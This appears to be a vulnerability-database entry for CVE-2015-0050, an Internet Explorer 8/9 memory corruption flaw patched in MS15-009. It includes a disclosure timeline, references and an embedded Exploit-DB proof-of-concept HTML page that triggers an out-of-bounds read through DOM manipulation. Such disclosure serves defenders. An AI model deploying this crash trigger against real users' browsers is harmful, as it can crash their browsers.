CVE-2015-0050
critical
CVSS v3
—
CVSS v4 NEW
—
VIR risk
10.0
Description
Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-8967 and CVE-2015-0044.
Predictions
Exploit likelihood
20%
Patch ETA
—
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.
✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Microsoft Internet Explorer 8 - MSHTML 'SRunPointer::SpanQualifier/RunType' Out-Of-Bounds Read (MS15-009)
<!--
Source: http://blog.skylined.nl/20161122001.html
Synopsis
A specially crafted web-page can cause Microsoft Internet Explorer 8 to attempt to read data beyond the boundaries of a memory allocation. The issue does not appear to be easily exploitable.
Known affected software, attack vectors and mitigations
Microsoft Internet Explorer 8
An attacker would need to get a target user to open a specially crafted web-page. Disabling Javascript should prevent an attacker from triggering the vulnerable code path.
Repro.html:
-->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=Edge" />
<style>
position_fixed { position: fixed; }
position_relative { position: relative; }
float_left { float: left; }
complex { float: left; width: 100%; }
complex:first-line { clear: left; }
</style>
<script>
window.onload = function boom() {
oElement_float_left = document.createElement('float_left');
oElement_complex = document.createElement('complex');
oElement_position_fixed = document.createElement('position_fixed');
oElement_position_relative = document.createElement('position_relative');
oElement_table = document.createElement('table');
oElement_x = document.createElement('x');
oTextNode = document.createTextNode('x');
document.documentElement.appendChild(oElement_float_left);
oElement_float_left.appendChild(oElement_complex);
oElement_float_left.appendChild(oTextNode);
oElement_complex.appendChild(oElement_position_fixed);
oElement_complex.appendChild(oElement_position_relative);
oElement_complex.appendChild(oElement_table);
oElement_complex.appendChild(oElement_x);
setTimeout(function() {
oElement_x.setAttribute('class', 'x');
setTimeout(function() {
alert();
document.write(0);
}, 0);
}, 0);
}
</script>
</head>
</html>
<!--
Description
The issue requires rather complex manipulation of the DOM and results in reading a value immediately following an object. The lower three bits of this value are returned by the function doing the reading, resulting in a return value in the range 0-7. After exhaustively skipping over the read AV and having that function return each value, no other side effects were noticed. For that reason I assume this issue is hard if not impossible to exploit and did not investigate further. It is still possible that there may be subtle effects that I did not notice that allow exploitation in some form or other.
Time-line
June 2014: This vulnerability was found through fuzzing.
October 2014: This vulnerability was submitted to ZDI.
October 2014: This vulnerability was rejected by ZDI.
November 2014: This vulnerability was reported to MSRC.
February 2015: This vulnerability was addressed by Microsoft in MS15-009.
November 2016: Details of this issue are released.
-->Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| microsoft | internet_explorer | 8 | |
| microsoft | internet_explorer | 9 | |
References
- http://blog.skylined.nl/20161122001.html
- http://seclists.org/fulldisclosure/2016/Nov/135
- http://www.securityfocus.com/archive/1/539808/100/0/threaded
- http://www.securityfocus.com/bid/72419
- http://www.securitytracker.com/id/1031723
- https://docs.microsoft.com/en-us/security-updates/securitybulletins/2015/ms15-009
- https://www.exploit-db.com/exploits/40841/
- http://blog.skylined.nl/20161122001.html
- http://seclists.org/fulldisclosure/2016/Nov/135
- http://www.securityfocus.com/archive/1/539808/100/0/threaded
- http://www.securityfocus.com/bid/72419
- http://www.securitytracker.com/id/1031723
- https://docs.microsoft.com/en-us/security-updates/securitybulletins/2015/ms15-009
- https://www.exploit-db.com/exploits/40841/
CWEs
CWE-399
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.